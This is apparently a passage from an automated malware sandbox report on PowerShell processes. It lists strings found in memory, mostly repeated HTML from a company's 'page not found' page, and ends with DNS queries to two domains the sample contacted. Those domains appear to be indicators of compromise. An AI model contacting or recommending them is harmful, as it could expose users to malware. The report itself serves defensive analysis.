13.28 10.16L13.32 8.48002Z" fill="#333333"></path> </svg> </a> <a href="https://twitter.com/TrasixME" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M22.162 5.65593C21.3986 5.99362 20.589 6.2154 19.76 6.31393C20.6337 5.79136 21.2877 4.96894 21.6 3.99993C20.78 4.48793 19.881 4.82993 18.944 5.01493C18.3146 4.34151 17.4804 3.89489 16.5709 3.74451C15.6615 3.59413 14.7279 3.74842 13.9153 4.18338C13.1026 4.61834 12.4564 5.30961 12.0771 6.14972C11.6978 6.98983 11.6067 7.93171 11.818 8.82893C10.1551 8.74558 8.52832 8.31345 7.04328 7.56059C5.55823 6.80773 4.24812 5.75097 3.19799 4.45893C2.82628 5.09738 2.63095 5.82315 2.63199 6.56193C2.63199 8.01193 3.36999 9.29293 4.49199 10.0429C3.828 10.022 3.17862 9.84271 2.59799 9.51993V9.57193C2.59819 10.5376 2.93236 11.4735 3.54384 12.221C4.15532 12.9684 5.00647 13.4814 5.95299 13.6729C5.33661 13.84 4.6903 13.8646 4.06299 13.7449C4.32986 14.5762 4.85 15.3031 5.55058 15.824C6.25117 16.3449 7.09712 16.6337 7.96999 16.6499C7.10247 17.3313 6.10917 17.8349 5.04687 18.1321C3.98458 18.4293 2.87412 18.5142 1.77899 18.3819C3.69069 19.6114 5.91609 20.264 8.18899 20.2619C15.882 20.2619 20.089 13.8889 20.089 8.36193C20.089 8.18193 20.084 7.99993 20.076 7.82193C20.8949 7.23009 21.6016 6.49695 22.163 5.65693L22.162 5.65593Z" fill="#333333"></path> </svg> </a> <a href="https://www.facebook.com/TrasixME/" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M17 9.1436H13.4025V7.35836C13.4025 7.35836 13.201 5.66065 14.367 5.66065C15.6847 5.66065 16.7369 5.66065 16.7369 5.66065V2H12.7019C12.7019 2 9.32529 1.9854 9.32529 5.43747C9.32529 6.17903 9.32193 7.52913 9.31685 9.1436H7V12.091H9.31091C9.29742 16.7772 9.2814 22 9.2814 22H13.4025V12.091H16.1223L17 9.1436Z" fill="#333333"></path> </svg> </a></div><div class="footer__policy"> <a href="https://trasix.com/privacy-policy/">Privacy policy</a> <a href="https://trasix.com/terms/">Terms</a></div></div></div><div class="footer__right"><h2 class="footer__title">We collaborate with ambitious brands and people. Let equals www.linkedin.com (Linkedin)
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 2024 Trasix</span></div><div><div class="footer__social"> <a href="https://www.linkedin.com/company/3836914" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6.94 5.00002C6.93974 5.53046 6.72877 6.03906 6.35351 6.41394C5.97825 6.78883 5.46944 6.99929 4.939 6.99902C4.40857 6.99876 3.89997 6.78779 3.52508 6.41253C3.1502 6.03727 2.93974 5.52846 2.94 4.99802C2.94027 4.46759 3.15124 3.95899 3.5265 3.5841C3.90176 3.20922 4.41057 2.99876 4.941 2.99902C5.47144 2.99929 5.98004 3.21026 6.35492 3.58552C6.72981 3.96078 6.94027 4.46959 6.94 5.00002ZM7 8.48002H3V21H7V8.48002ZM13.32 8.48002H9.34V21H13.28V14.43C13.28 10.77 18.05 10.43 18.05 14.43V21H22V13.07C22 6.90002 14.94 7.13002 13.28 10.16L13.32 8.48002Z" fill="#333333"></path> </svg> </a> <a href="https://twitter.com/TrasixME" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M22.162 5.65593C21.3986 5.99362 20.589 6.2154 19.76 6.31393C20.6337 5.79136 21.2877 4.96894 21.6 3.99993C20.78 4.48793 19.881 4.82993 18.944 5.01493C18.3146 4.34151 17.4804 3.89489 16.5709 3.74451C15.6615 3.59413 14.7279 3.74842 13.9153 4.18338C13.1026 4.61834 12.4564 5.30961 12.0771 6.14972C11.6978 6.98983 11.6067 7.93171 11.818 8.82893C10.1551 8.74558 8.52832 8.31345 7.04328 7.56059C5.55823 6.80773 4.24812 5.75097 3.19799 4.45893C2.82628 5.09738 2.63095 5.82315 2.63199 6.56193C2.63199 8.01193 3.36999 9.29293 4.49199 10.0429C3.828 10.022 3.17862 9.84271 2.59799 9.51993V9.57193C2.59819 10.5376 2.93236 11.4735 3.54384 12.221C4.15532 12.9684 5.00647 13.4814 5.95299 13.6729C5.33661 13.84 4.6903 13.8646 4.06299 13.7449C4.32986 14.5762 4.85 15.3031 5.55058 15.824C6.25117 16.3449 7.09712 16.6337 7.96999 16.6499C7.10247 17.3313 6.10917 17.8349 5.04687 18.1321C3.98458 18.4293 2.87412 18.5142 1.77899 18.3819C3.69069 19.6114 5.91609 20.264 8.18899 20.2619C15.882 20.2619 20.089 13.8889 20.089 8.36193C20.089 8.18193 20.084 7.99993 20.076 7.82193C20.8949 7.23009 21.6016 6.49695 22.163 5.65693L22.162 5.65593Z" fill="#333333"></path> </svg> </a> <a href="https://www.facebook.com/TrasixME/" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M17 9.1436H13.4025V7.35836C13.4025 7.35836 13.201 5.66065 14.367 5.66065C15.6847 5.66065 16.7369 5.66065 16.7369 5.66065V2H12.7019C12.7019 2 9.32529 1.9854 9.32529 5.43747C9.32529 6.17903 9.32193 7.52913 9.31685 9.1436H7V12.091H9.31091C9.29742 16.7772 9.2814 22 9.2814 22H13.4025V12.091H16.1223L17 9.1436Z" fill="#333333"></path> </svg> </a></div><div class="footer__policy"> <a href="https://trasix.com/privacy-policy/">Privacy policy</a> <a href="https://trasix.com/terms/">Terms</a></div></div></div><div class="footer__right"><h2 class="footer__title">We collaborate with ambitious brands and people. Let equals www.twitter.com (Twitter)
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.css"><link rel="apple-touch-icon" sizes="180x180" href="/wp-content/themes/trasix/images/favicon/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/wp-content/themes/trasix/images/favicon/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/wp-content/themes/trasix/images/favicon/favicon-16x16.png"><link rel="manifest" href="/wp-content/themes/trasix/images/favicon/site.webmanifest"><link rel="mask-icon" href="/wp-content/themes/trasix/images/favicon/safari-pinned-tab.svg" color="#d81b42"><link rel="shortcut icon" href="/wp-content/themes/trasix/images/favicon/favicon.ico"><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-config" content="/wp-content/themes/trasix/images/favicon/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-Light.ttf" type="font/ttf" crossorigin><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-Bold.ttf" type="font/ttf" crossorigin><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-SemiBold.ttf" type="font/ttf" crossorigin><meta name='robots' content='noindex, follow' /><link media="all" href="https://trasix.com/wp-content/cache/autoptimize/css/autoptimize_b84897168bbb31e8d1c0e99da21478a7.css" rel="stylesheet"><title>Page not found - Trasix</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Trasix" /><meta property="og:site_name" content="Trasix" /> <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://trasix.com/#website","url":"https://trasix.com/","name":"Trasix","description":"","publisher":{"@id":"https://trasix.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://trasix.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://trasix.com/#organization","name":"Trasix DMCC","url":"https://trasix.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://trasix.com/#/schema/logo/image/","url":"https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png","contentUrl":"https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png","width":1474,"height":1526,"caption":"Trasix DMCC"},"image":{"@id":"https://trasix.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/TrasixME","https://x.com/TrasixME","https://www.youtube.com/channel/UCtgdwIXFtB2obuqfvM8gdGQ"]}]}</script> <l
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.css"><link rel="apple-touch-icon" sizes="180x180" href="/wp-content/themes/trasix/images/favicon/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/wp-content/themes/trasix/images/favicon/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/wp-content/themes/trasix/images/favicon/favicon-16x16.png"><link rel="manifest" href="/wp-content/themes/trasix/images/favicon/site.webmanifest"><link rel="mask-icon" href="/wp-content/themes/trasix/images/favicon/safari-pinned-tab.svg" color="#d81b42"><link rel="shortcut icon" href="/wp-content/themes/trasix/images/favicon/favicon.ico"><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-config" content="/wp-content/themes/trasix/images/favicon/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-Light.ttf" type="font/ttf" crossorigin><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-Bold.ttf" type="font/ttf" crossorigin><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-SemiBold.ttf" type="font/ttf" crossorigin><meta name='robots' content='noindex, follow' /><link media="all" href="https://trasix.com/wp-content/cache/autoptimize/css/autoptimize_b84897168bbb31e8d1c0e99da21478a7.css" rel="stylesheet"><title>Page not found - Trasix</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Trasix" /><meta property="og:site_name" content="Trasix" /> <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://trasix.com/#website","url":"https://trasix.com/","name":"Trasix","description":"","publisher":{"@id":"https://trasix.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://trasix.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://trasix.com/#organization","name":"Trasix DMCC","url":"https://trasix.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://trasix.com/#/schema/logo/image/","url":"https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png","contentUrl":"https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png","width":1474,"height":1526,"caption":"Trasix DMCC"},"image":{"@id":"https://trasix.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/TrasixME","https://x.com/TrasixME","https://www.youtube.com/channel/UCtgdwIXFtB2obuqfvM8gdGQ"]}]}</script> <l
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: /svg> </a> <a href="https://twitter.com/TrasixME" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M22.162 5.65593C21.3986 5.99362 20.589 6.2154 19.76 6.31393C20.6337 5.79136 21.2877 4.96894 21.6 3.99993C20.78 4.48793 19.881 4.82993 18.944 5.01493C18.3146 4.34151 17.4804 3.89489 16.5709 3.74451C15.6615 3.59413 14.7279 3.74842 13.9153 4.18338C13.1026 4.61834 12.4564 5.30961 12.0771 6.14972C11.6978 6.98983 11.6067 7.93171 11.818 8.82893C10.1551 8.74558 8.52832 8.31345 7.04328 7.56059C5.55823 6.80773 4.24812 5.75097 3.19799 4.45893C2.82628 5.09738 2.63095 5.82315 2.63199 6.56193C2.63199 8.01193 3.36999 9.29293 4.49199 10.0429C3.828 10.022 3.17862 9.84271 2.59799 9.51993V9.57193C2.59819 10.5376 2.93236 11.4735 3.54384 12.221C4.15532 12.9684 5.00647 13.4814 5.95299 13.6729C5.33661 13.84 4.6903 13.8646 4.06299 13.7449C4.32986 14.5762 4.85 15.3031 5.55058 15.824C6.25117 16.3449 7.09712 16.6337 7.96999 16.6499C7.10247 17.3313 6.10917 17.8349 5.04687 18.1321C3.98458 18.4293 2.87412 18.5142 1.77899 18.3819C3.69069 19.6114 5.91609 20.264 8.18899 20.2619C15.882 20.2619 20.089 13.8889 20.089 8.36193C20.089 8.18193 20.084 7.99993 20.076 7.82193C20.8949 7.23009 21.6016 6.49695 22.163 5.65693L22.162 5.65593Z" fill="#333333"></path> </svg> </a> <a href="https://www.facebook.com/TrasixME/" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M17 9.1436H13.4025V7.35836C13.4025 7.35836 13.201 5.66065 14.367 5.66065C15.6847 5.66065 16.7369 5.66065 16.7369 5.66065V2H12.7019C12.7019 2 9.32529 1.9854 9.32529 5.43747C9.32529 6.17903 9.32193 7.52913 9.31685 9.1436H7V12.091H9.31091C9.29742 16.7772 9.2814 22 9.2814 22H13.4025V12.091H16.1223L17 9.1436Z" fill="#333333"></path> </svg> </a></div><div class="footer__policy"> <a href="https://trasix.com/privacy-policy/">Privacy policy</a> <a href="https://trasix.com/terms/">Terms</a></div></div></div><div class="footer__right"><h2 class="footer__title">We collaborate with ambitious brands and people. Let equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: /svg> </a> <a href="https://twitter.com/TrasixME" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M22.162 5.65593C21.3986 5.99362 20.589 6.2154 19.76 6.31393C20.6337 5.79136 21.2877 4.96894 21.6 3.99993C20.78 4.48793 19.881 4.82993 18.944 5.01493C18.3146 4.34151 17.4804 3.89489 16.5709 3.74451C15.6615 3.59413 14.7279 3.74842 13.9153 4.18338C13.1026 4.61834 12.4564 5.30961 12.0771 6.14972C11.6978 6.98983 11.6067 7.93171 11.818 8.82893C10.1551 8.74558 8.52832 8.31345 7.04328 7.56059C5.55823 6.80773 4.24812 5.75097 3.19799 4.45893C2.82628 5.09738 2.63095 5.82315 2.63199 6.56193C2.63199 8.01193 3.36999 9.29293 4.49199 10.0429C3.828 10.022 3.17862 9.84271 2.59799 9.51993V9.57193C2.59819 10.5376 2.93236 11.4735 3.54384 12.221C4.15532 12.9684 5.00647 13.4814 5.95299 13.6729C5.33661 13.84 4.6903 13.8646 4.06299 13.7449C4.32986 14.5762 4.85 15.3031 5.55058 15.824C6.25117 16.3449 7.09712 16.6337 7.96999 16.6499C7.10247 17.3313 6.10917 17.8349 5.04687 18.1321C3.98458 18.4293 2.87412 18.5142 1.77899 18.3819C3.69069 19.6114 5.91609 20.264 8.18899 20.2619C15.882 20.2619 20.089 13.8889 20.089 8.36193C20.089 8.18193 20.084 7.99993 20.076 7.82193C20.8949 7.23009 21.6016 6.49695 22.163 5.65693L22.162 5.65593Z" fill="#333333"></path> </svg> </a> <a href="https://www.facebook.com/TrasixME/" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M17 9.1436H13.4025V7.35836C13.4025 7.35836 13.201 5.66065 14.367 5.66065C15.6847 5.66065 16.7369 5.66065 16.7369 5.66065V2H12.7019C12.7019 2 9.32529 1.9854 9.32529 5.43747C9.32529 6.17903 9.32193 7.52913 9.31685 9.1436H7V12.091H9.31091C9.29742 16.7772 9.2814 22 9.2814 22H13.4025V12.091H16.1223L17 9.1436Z" fill="#333333"></path> </svg> </a></div><div class="footer__policy"> <a href="https://trasix.com/privacy-policy/">Privacy policy</a> <a href="https://trasix.com/terms/">Terms</a></div></div></div><div class="footer__right"><h2 class="footer__title">We collaborate with ambitious brands and people. Let equals www.twitter.com (Twitter)
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.css"><link rel="apple-touch-icon" sizes="180x180" href="/wp-content/themes/trasix/images/favicon/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/wp-content/themes/trasix/images/favicon/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/wp-content/themes/trasix/images/favicon/favicon-16x16.png"><link rel="manifest" href="/wp-content/themes/trasix/images/favicon/site.webmanifest"><link rel="mask-icon" href="/wp-content/themes/trasix/images/favicon/safari-pinned-tab.svg" color="#d81b42"><link rel="shortcut icon" href="/wp-content/themes/trasix/images/favicon/favicon.ico"><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-config" content="/wp-content/themes/trasix/images/favicon/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-Light.ttf" type="font/ttf" crossorigin><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-Bold.ttf" type="font/ttf" crossorigin><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-SemiBold.ttf" type="font/ttf" crossorigin><meta name='robots' content='noindex, follow' /><link media="all" href="https://trasix.com/wp-content/cache/autoptimize/css/autoptimize_b84897168bbb31e8d1c0e99da21478a7.css" rel="stylesheet"><title>Page not found - Trasix</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Trasix" /><meta property="og:site_name" content="Trasix" /> <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://trasix.com/#website","url":"https://trasix.com/","name":"Trasix","description":"","publisher":{"@id":"https://trasix.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://trasix.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://trasix.com/#organization","name":"Trasix DMCC","url":"https://trasix.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://trasix.com/#/schema/logo/image/","url":"https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png","contentUrl":"https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png","width":1474,"height":1526,"caption":"Trasix DMCC"},"image":{"@id":"https://trasix.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/TrasixME","https://x.com/TrasixME","https://www.youtube.com/channel/UCtgdwIXFtB2obuqfvM8gdGQ"]}]}</script> <li
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.css"><link rel="apple-touch-icon" sizes="180x180" href="/wp-content/themes/trasix/images/favicon/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/wp-content/themes/trasix/images/favicon/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/wp-content/themes/trasix/images/favicon/favicon-16x16.png"><link rel="manifest" href="/wp-content/themes/trasix/images/favicon/site.webmanifest"><link rel="mask-icon" href="/wp-content/themes/trasix/images/favicon/safari-pinned-tab.svg" color="#d81b42"><link rel="shortcut icon" href="/wp-content/themes/trasix/images/favicon/favicon.ico"><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-config" content="/wp-content/themes/trasix/images/favicon/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-Light.ttf" type="font/ttf" crossorigin><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-Bold.ttf" type="font/ttf" crossorigin><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-SemiBold.ttf" type="font/ttf" crossorigin><meta name='robots' content='noindex, follow' /><link media="all" href="https://trasix.com/wp-content/cache/autoptimize/css/autoptimize_b84897168bbb31e8d1c0e99da21478a7.css" rel="stylesheet"><title>Page not found - Trasix</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Trasix" /><meta property="og:site_name" content="Trasix" /> <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://trasix.com/#website","url":"https://trasix.com/","name":"Trasix","description":"","publisher":{"@id":"https://trasix.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://trasix.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://trasix.com/#organization","name":"Trasix DMCC","url":"https://trasix.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://trasix.com/#/schema/logo/image/","url":"https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png","contentUrl":"https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png","width":1474,"height":1526,"caption":"Trasix DMCC"},"image":{"@id":"https://trasix.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/TrasixME","https://x.com/TrasixME","https://www.youtube.com/channel/UCtgdwIXFtB2obuqfvM8gdGQ"]}]}</script> <li
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.css"><link rel="apple-touch-icon" sizes="180x180" href="/wp-content/themes/trasix/images/favicon/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/wp-content/themes/trasix/images/favicon/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/wp-content/themes/trasix/images/favicon/favicon-16x16.png"><link rel="manifest" href="/wp-content/themes/trasix/images/favicon/site.webmanifest"><link rel="mask-icon" href="/wp-content/themes/trasix/images/favicon/safari-pinned-tab.svg" color="#d81b42"><link rel="shortcut icon" href="/wp-content/themes/trasix/images/favicon/favicon.ico"><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-config" content="/wp-content/themes/trasix/images/favicon/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-Light.ttf" type="font/ttf" crossorigin><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-Bold.ttf" type="font/ttf" crossorigin><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-SemiBold.ttf" type="font/ttf" crossorigin><meta name='robots' content='noindex, follow' /><link media="all" href="https://trasix.com/wp-content/cache/autoptimize/css/autoptimize_b84897168bbb31e8d1c0e99da21478a7.css" rel="stylesheet"><title>Page not found - Trasix</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Trasix" /><meta property="og:site_name" content="Trasix" /> <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://trasix.com/#website","url":"https://trasix.com/","name":"Trasix","description":"","publisher":{"@id":"https://trasix.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://trasix.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://trasix.com/#organization","name":"Trasix DMCC","url":"https://trasix.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://trasix.com/#/schema/logo/image/","url":"https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png","contentUrl":"https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png","width":1474,"height":1526,"caption":"Trasix DMCC"},"image":{"@id":"https://trasix.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/TrasixME","https://x.com/TrasixME","https://www.youtube.com/channel/UCtgdwIXFtB2obuqfvM8gdGQ"]}]}</script> <l
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.css"><link rel="apple-touch-icon" sizes="180x180" href="/wp-content/themes/trasix/images/favicon/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/wp-content/themes/trasix/images/favicon/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/wp-content/themes/trasix/images/favicon/favicon-16x16.png"><link rel="manifest" href="/wp-content/themes/trasix/images/favicon/site.webmanifest"><link rel="mask-icon" href="/wp-content/themes/trasix/images/favicon/safari-pinned-tab.svg" color="#d81b42"><link rel="shortcut icon" href="/wp-content/themes/trasix/images/favicon/favicon.ico"><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-config" content="/wp-content/themes/trasix/images/favicon/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-Light.ttf" type="font/ttf" crossorigin><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-Bold.ttf" type="font/ttf" crossorigin><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-SemiBold.ttf" type="font/ttf" crossorigin><meta name='robots' content='noindex, follow' /><link media="all" href="https://trasix.com/wp-content/cache/autoptimize/css/autoptimize_b84897168bbb31e8d1c0e99da21478a7.css" rel="stylesheet"><title>Page not found - Trasix</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Trasix" /><meta property="og:site_name" content="Trasix" /> <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://trasix.com/#website","url":"https://trasix.com/","name":"Trasix","description":"","publisher":{"@id":"https://trasix.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://trasix.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://trasix.com/#organization","name":"Trasix DMCC","url":"https://trasix.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://trasix.com/#/schema/logo/image/","url":"https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png","contentUrl":"https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png","width":1474,"height":1526,"caption":"Trasix DMCC"},"image":{"@id":"https://trasix.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/TrasixME","https://x.com/TrasixME","https://www.youtube.com/channel/UCtgdwIXFtB2obuqfvM8gdGQ"]}]}</script> <l
Source: powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: actividades.laforetlanguages.com
Source: global traffic	DNS traffic detected: DNS query: sbcopylive.com.br
